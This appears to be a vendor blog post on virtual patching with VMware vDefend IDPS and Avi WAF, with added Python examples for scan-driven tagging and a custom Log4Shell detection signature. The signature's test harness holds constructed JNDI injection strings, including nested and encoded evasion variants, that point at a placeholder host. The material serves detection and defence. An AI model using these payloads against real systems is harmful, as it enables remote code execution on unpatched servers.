As the digital landscape enters the age of Artificial Intelligence, the traditional methods of securing applications are being fundamentally challenged. Advanced AI models have shifted the advantage towards attackers: with AI assistance, even a novice can operate like a sophisticated attacker, semi-autonomously, at very low cost and at unprecedented scale. Consider the damage that ransomware gangs and nation-state actors could do with such tooling. Recent ransomware attacks have taken business operations offline for weeks or months, with financial losses in the hundreds of millions of dollars. To maintain a cyber resilient posture, organizations must move beyond reactive security and embrace a proactive defense-in-depth strategy centered on lateral security and virtual patching.
AI-discovered Tsunami of Exploits
Frontier AI models can help find unknown (zero-day) software vulnerabilities and develop working exploits for them faster than ever before. Attackers can use these exploits to infiltrate enterprises and then propagate laterally, hopping from host to host in search of high-value assets to ransom or secrets to steal. They can launch widespread, volumetric and/or targeted attacks semi-autonomously, driving an exponential increase in attack volume against an already large attack surface. "Security through obscurity" is no longer a viable cyber security strategy.
If enterprises could patch software vulnerabilities quickly, they would certainly reduce the risk of a breach and of its spread. In practice this is an extremely time-consuming and resource-intensive endeavor. There are thousands of software tools and apps, each at varied versions, deployed on different hardware and operating systems and spread across multiple data centers. In larger organizations the "race to patch" can take weeks to months to roll a patch out enterprise-wide, leaving the organization exposed to infiltration, ransom and potentially business disruption.
To quickly protect workloads and apps against this tsunami of exploits, and to buy down risk, enterprises need to focus on two key defenses for their private cloud workloads:
- Enable virtual patching using intrusion prevention systems and web application firewalls
- Restrict propagation of attacks with lateral segmentation
What is Virtual Patching?
Virtual patching is a vulnerability-shielding tactic that protects an asset by placing a minimal layer of security policy at the network or application delivery layer in front of it. These policies intercept and block exploit attempts before they reach the vulnerable software, effectively "patching" the flaw in the communication path rather than in the software itself.
Key Benefits of Virtual Patching
- Application availability: Keeps applications and assets available while the risk is mitigated, with no maintenance window for a reboot or redeploy
- No code changes: Protects applications without requiring deployment of updated software. Vendor patches can introduce regressions; a virtual patch avoids that risk (a blocking signature can still interfere with legitimate traffic, so validate a new virtual patch in detect-only mode before switching it to prevent)
- Targeted signatures: Enabling only the signatures relevant to a workload's known vulnerabilities reduces false positives and performance impact
- Zero-day protection: Provides a rapid response to vulnerabilities for which no official patch yet exists
- Legacy support: Shields older, unsupported systems that are still critical to business operations, for which a vendor patch may never be published
- Buys time: Grants security teams the cycles needed to test and deploy permanent vendor patches without remaining exposed in the meantime
- Helps with compliance: Many regulations, such as PCI-DSS and HIPAA, require timely deployment of security controls (or documented compensating controls) to remain compliant
vDefend Distributed IDPS: Hypervisor-embedded Virtual Patching
VMware vDefend provides a hypervisor-embedded approach to virtual patching of workloads by integrating security directly into the VMware Cloud Foundation (VCF) hypervisor fabric. The vDefend Distributed IDPS (Intrusion Detection and Prevention System) is applied at the vNIC of every workload, enabling deep, granular inspection of every packet of application traffic moving across the VCF private cloud, specifically targeting network-layer exploits and lateral movement.
How vDefend IDPS Enables Virtual Patching
- Hypervisor-Integrated Inspection: vDefend's Distributed IDPS inspects network traffic at the vNIC of every VCF workload, so exploit attempts against an unpatched server are blocked whether they originate outside the network or from an already-compromised neighbor inside it. A network signature can only match what it can see: exploit traffic carried inside an encrypted session that the IDPS does not terminate is not inspected, so pair it with an application-layer control such as a WAF at the point where TLS terminates.
- Automated dynamic policies: Run a vulnerability scan to identify vulnerable workloads, tag them by the vulnerability found, and create a virtual-patching policy that applies a limited set of IDPS signatures to the tagged group. As new vulnerable workloads are identified and tagged, they join the group automatically and receive protection immediately.
- East-West Security: IDPS prevents attackers from exploiting vulnerabilities to move laterally within the environment and eventually compromising high-value assets.
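The scan-tag-policy loop above, as an added example (not vDefend or NSX code): a constructed vulnerability scan export is turned into per-VM tags, a tag-based dynamic group, an IDPS profile restricted to the signatures for each CVE, and a DETECT_PREVENT rule scoped to that group. Findings with no matching signature are reported separately, because they cannot be virtually patched and need a real patch or isolation. The endpoint paths, field names, the `vuln` tag scope and the signature IDs are assumptions modelled on the NSX-T Policy API and must be checked against your release and your signature bundle.

```python
"""Scan -> tag -> IDPS policy automation for virtual patching (added example)."""
import json
import re

# Constructed scanner export (not real scan data): one row per VM/CVE pair.
SCAN_RESULTS = [
    {"vm": "web-01", "vm_id": "50123abc-0001", "cve": "CVE-2021-44228", "cvss": 10.0},
    {"vm": "web-02", "vm_id": "50123abc-0002", "cve": "CVE-2021-44228", "cvss": 10.0},
    {"vm": "mft-01", "vm_id": "50123abc-0003", "cve": "CVE-2024-5806", "cvss": 9.1},
    {"vm": "db-01",  "vm_id": "50123abc-0004", "cve": "CVE-2023-0001", "cvss": 7.5},
    {"vm": "bad-01", "vm_id": "50123abc-0005", "cve": "not-a-cve",     "cvss": 0.0},
]

# Constructed CVE -> signature-ID map. Real IDs come from the vendor signature
# portal; the numbers here are placeholders, not vDefend signature IDs.
SIGNATURE_CATALOG = {
    "CVE-2021-44228": ["9000001", "9000002"],
    "CVE-2024-5806": ["9000010"],
}

TAG_SCOPE = "vuln"           # assumed tag scope; tags render as vuln|CVE-...
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")
GROUPS = "/infra/domains/default/groups"
PROFILES = "/infra/settings/firewall/security/intrusion-services/profiles"
POLICY = "/infra/domains/default/intrusion-service-policies/virtual-patching"
TAG_VM = "/infra/realized-state/enforcement-points/default/virtual-machines?action=update_tags"


def plan_virtual_patch(findings, catalog):
    """Split findings into covered (a signature exists) and uncovered."""
    covered, uncovered = {}, []
    for f in findings:
        if not CVE_RE.fullmatch(f["cve"]):
            raise ValueError(f"malformed CVE id in scan export: {f['cve']!r}")
        if f["cve"] in catalog:
            covered.setdefault(f["cve"], []).append(f)
        else:
            uncovered.append(f)
    return covered, uncovered


def vm_tag_requests(covered):
    """One update_tags body per VM, carrying every covered CVE found on it."""
    per_vm = {}
    for cve, rows in covered.items():
        for r in rows:
            per_vm.setdefault(r["vm_id"], set()).add(cve)
    return {vm_id: {"virtual_machine_id": vm_id,
                    "tags": [{"scope": TAG_SCOPE, "tag": c} for c in sorted(cves)]}
            for vm_id, cves in per_vm.items()}


def group_body(cve):
    """Dynamic group: any VM tagged vuln|<cve>, now or later, is a member."""
    return {"display_name": f"vp-{cve}",
            "expression": [{"resource_type": "Condition", "member_type": "VirtualMachine",
                            "key": "Tag", "operator": "EQUALS",
                            "value": f"{TAG_SCOPE}|{cve}"}]}


def profile_body(cve, catalog):
    """Narrow IDPS profile: only this CVE's signatures, each forced to REJECT."""
    return {"display_name": f"vp-{cve}",
            "profile_severity": ["CRITICAL", "HIGH"],
            "overridden_signatures": [{"signature_id": sid, "action": "REJECT", "enable": True}
                                      for sid in catalog[cve]]}


def rule_body(cve):
    """Rule applied to the group only; use DETECT first when validating new signatures."""
    group = f"{GROUPS}/vp-{cve}"
    return {"display_name": f"vp-{cve}", "source_groups": ["ANY"],
            "destination_groups": [group], "services": ["ANY"],
            "ids_profiles": [f"{PROFILES}/vp-{cve}"],
            "action": "DETECT_PREVENT", "scope": [group]}


def build_api_calls(findings, catalog):
    """Return (list of (method, path, body), uncovered findings)."""
    good = [f for f in findings if CVE_RE.fullmatch(f["cve"])]   # drop junk rows up front
    covered, uncovered = plan_virtual_patch(good, catalog)
    calls = [("POST", "/policy/api/v1" + TAG_VM, body)
             for body in vm_tag_requests(covered).values()]
    for cve in sorted(covered):
        calls.append(("PATCH", f"/policy/api/v1{GROUPS}/vp-{cve}", group_body(cve)))
        calls.append(("PATCH", f"/policy/api/v1{PROFILES}/vp-{cve}", profile_body(cve, catalog)))
        calls.append(("PATCH", f"/policy/api/v1{POLICY}/rules/vp-{cve}", rule_body(cve)))
    return calls, uncovered


if __name__ == "__main__":
    calls, uncovered = build_api_calls(SCAN_RESULTS, SIGNATURE_CATALOG)
    for method, path, body in calls:
        print(method, path)
        print(json.dumps(body, indent=2))
    for f in uncovered:
        print(f"NO SIGNATURE for {f['cve']} on {f['vm']}: needs a real patch or isolation")
```

The script only prints the calls; sending them (with the manager URL and credentials) is left to the operator so the plan can be reviewed first. The group is keyed on the tag rather than on a static VM list, which is what makes the policy follow newly tagged workloads without further changes.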
Examples of Vulnerability Protection
- MOVEit Transfer Authentication Bypass (CVE-2024-5806): This flaw in the SFTP module of Progress MOVEit Transfer allowed attackers to bypass authentication and retrieve files without a password. vDefend can detect the insufficient-validation pattern during the initial connection phase and stop the attack in its tracks.
- Ni8mare (CVE-2026-21858): This unauthenticated RCE flaw in the n8n automation platform allows attackers to achieve full system takeover via Content-Type confusion. vDefend identifies the malformed JSON payloads and mismatched headers and blocks the exploit before an attacker can hijack internal workflows to move laterally through the data center.
- Log4Shell (CVE-2021-44228): vDefend IDPS can detect and prevent attempts to exploit the Log4Shell vulnerability. The flaw lies in the message lookup feature of Log4j 2: an attacker-controlled string such as ${jndi:ldap://...} that the application logs triggers a Java Naming and Directory Interface (JNDI) lookup, which fetches and executes attacker-supplied code and gives full control of the targeted system. (Demo: Protecting against Log4Shell with VMware vDefend ATP)
The vDefend Advantage: What makes vDefend IDPS powerful for this use case is its architectural advantage, signature strategy, and operational simplicity.
- Speed matters in the era of AI-driven threats. vDefend’s built-in closed-loop security architecture — through integration with the VCF private cloud platform — delivers detection as well as rapid mitigation, thus dramatically reducing attacker dwell time.
- vDefend IDPS signatures are updated frequently (multiple times a day), ensuring protection against the latest global threats. Broadcom's threat intelligence team actively analyzes new exploits, creates signatures and publishes updated signature bundles (see the IDPS signature portal).
- IDPS also supports custom signatures: customers can import trusted third-party signatures or develop their own in-house to virtually patch their applications, giving a truly bespoke security posture.
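A custom virtual patch for the Log4Shell case above, as an added example for both the Log4Shell entry and the custom-signature point (this is not a vDefend or Broadcom signature). The rule text is an illustrative one written in Suricata syntax (assumed to be the format accepted for custom signatures; the sid is a placeholder in the local range), and the Python matcher re-implements its detection logic so its coverage can be checked offline against constructed HTTP requests. The point it makes is that a naive `${jndi:` string match misses the nested-lookup and URL-encoded forms that circulated within days of the disclosure, so the pattern must match after decoding and tolerate `${...}` fragments between the letters.

```python
"""Evasion-aware Log4Shell signature check (added example, not a vendor signature)."""
import re
from urllib.parse import unquote

# Illustrative custom rule (assumption: Suricata 5+ syntax, local sid range).
# One rule per HTTP buffer is typical; http.uri and http.request_body copies
# of this rule would cover query strings and bodies in the same way.
CUSTOM_RULE = (
    'alert http any any -> $HOME_NET any ('
    'msg:"LOCAL Log4Shell JNDI lookup in HTTP header"; '
    'flow:established,to_server; http.header; '
    r'pcre:"/\$\{[^}]*j.*?n.*?d.*?i.*?:/i"; '
    'classtype:attempted-admin; sid:1000001; rev:1;)'
)

# The same pattern the rule's pcre uses: "${", then j, n, d, i, ":" in order,
# with anything (including nested ${...} lookups) allowed between the letters.
JNDI_RE = re.compile(r"\$\{[^}]*j.*?n.*?d.*?i.*?:", re.IGNORECASE)

# Constructed requests (not captured traffic). 203.0.113.0/24 is a documentation range.
REQUESTS = {
    "plain":          "GET /login HTTP/1.1\r\nUser-Agent: ${jndi:ldap://203.0.113.5:1389/a}\r\n\r\n",
    "nested":         "GET /login HTTP/1.1\r\nX-Api-Version: ${${lower:j}ndi:rmi://203.0.113.5/x}\r\n\r\n",
    "split":          "GET /login HTTP/1.1\r\nReferer: ${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.5/y}\r\n\r\n",
    "urlencoded":     "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.5%2Fz%7D HTTP/1.1\r\nHost: app\r\n\r\n",
    "double_encoded": "GET /search?q=%2524%257Bjndi%253Aldap%253A%252F%252F203.0.113.5%252Fz%257D HTTP/1.1\r\nHost: app\r\n\r\n",
    "benign":         "GET /search?q=${user.home}/logs HTTP/1.1\r\nUser-Agent: curl/8.4\r\n\r\n",
}


def normalize(raw: str) -> str:
    """Undo up to two layers of URL encoding; attackers double-encode to beat single-pass decoders."""
    s = raw
    for _ in range(2):
        s = unquote(s)
    return s


def naive_match(raw: str) -> bool:
    """What a first-day signature looked like: a literal substring match."""
    return "${jndi:" in raw.lower()


def signature_match(raw: str) -> bool:
    """The illustrative rule's logic: decode first, then the tolerant pattern."""
    return JNDI_RE.search(normalize(raw)) is not None


def evaluate(requests):
    """Return {name: (naive_hit, signature_hit)} for each constructed request."""
    return {name: (naive_match(r), signature_match(r)) for name, r in requests.items()}


if __name__ == "__main__":
    print(CUSTOM_RULE)
    for name, (naive, sig) in evaluate(REQUESTS).items():
        print(f"{name:15s} naive={naive!s:5s} signature={sig!s:5s}")
```

The benign request carries a `${user.home}` lookup with no JNDI scheme and is not flagged by either matcher, which is the false-positive check worth keeping when the pattern is tuned. As with any custom signature, load it in detect mode first and review the hits before changing the rule action to prevent.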
vDefend Distributed Firewall: Restrict Unauthorized Lateral Propagation
To further restrict lateral propagation of threats, vDefend also provides a high-performance, hypervisor-embedded Layer-7 Distributed Firewall (DFW). It allows comprehensive lateral segmentation of VCF workloads through streamlined context-based (tag-based) security policies. Lateral segmentation includes both macro- and micro-segmentation, applied to enforce trusted, least-privileged access to infrastructure services, environments (or zones) and applications. DFW is fully scale-out, eliminates traffic tromboning and the need for network changes (unlike traditional firewalls), and preserves the segmentation posture across vMotion events. It also includes a built-in prescriptive deployment tool, DFW 1-2-3-4 (blog), enabling rapid self-deployment across all workloads in as little as a few weeks.
Avi Web Application Firewall: Virtual Patching for Web Applications
While vDefend secures the internal network, the Avi Web Application Firewall (WAF) acts as the first line of defense for web-facing applications, providing virtual patching at the web layer.
How Avi WAF Prevents Exploitation
- Edge Defense: Avi WAF analyzes incoming north-south traffic, identifying and neutralizing OWASP Top 10 threats before they reach the application.
- Protocol-Aware Inspection: Its robust HTTP/HTML parser understands complex protocol features, ensuring that even obfuscated exploit attempts are caught within the application payload.
Examples of Vulnerability Protection
- SQL Injection (SQLi): Avi WAF virtually patches SQL-injection flaws by blocking requests whose web entry fields carry SQL injection payloads before they reach the vulnerable application and its database. An example is CVE-2025-31044 in the Premium SEO Pack plugin for WordPress. Avi uses a pipeline-based security model, inspecting incoming traffic at successive stages of its policy pipeline, so that encoded or fragmented SQLi is still caught.
- Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF): Avi WAF's XSS rules block requests that attempt to inject client-side scripts into web pages, and its built-in CSRF protection prevents a victim's browser from being tricked into issuing state-changing requests on an attacker's behalf. For example, Avi protects against the MCP Inspector tool vulnerability (CVE-2025-49596), which exposed a new class of browser-based attacks against AI developer tools.
- React2Shell (CVE-2025-55182): Avi WAF blocks Remote Code Execution (RCE) attempts such as command injection and language-specific payload attacks, and also blocks attempts at Remote File Inclusion (RFI) and Local File Inclusion (LFI) that could let an attacker execute arbitrary commands on the application server.
Scanner-driven virtual patching with Avi WAF: Avi WAF provides a built-in SDK that imports Dynamic Application Security Testing (DAST) scanner results to construct a customized WAF policy protecting the application against the threats the scanner found. Avi WAF supports Qualys Web App Scanning and OWASP ZAP (Zed Attack Proxy) results.
The Avi Advantage: Key differentiators for Avi WAF are its software-defined, scale-out architecture and its availability to every Avi customer.
- Unlike alternative WAF solutions that require a separate, expensive license, Avi WAF is included in the Avi license. Every Avi Load Balancer customer therefore already has the built-in capability to secure their web applications.
- Avi is also fully integrated with VCF, delivering a plug-and-play operational experience and self-service load balancing and WAF for both VM and Kubernetes (VMware Kubernetes Service, VKS) workloads.
Conclusion
In an AI-accelerated threat landscape, the "race to patch" has reached a breaking point. Organizations can no longer rely solely on the eventual roll-out of code updates to stay secure. By combining vDefend Distributed IDPS for lateral virtual patching, vDefend DFW for lateral segmentation and Avi WAF for web application security, enterprises can implement a comprehensive private cloud cyber defense strategy. This multi-layered approach provides immediate protection that blocks attackers from exploiting known vulnerabilities, buying the IT team the critical time needed to deploy permanent patches and maintain long-term application integrity.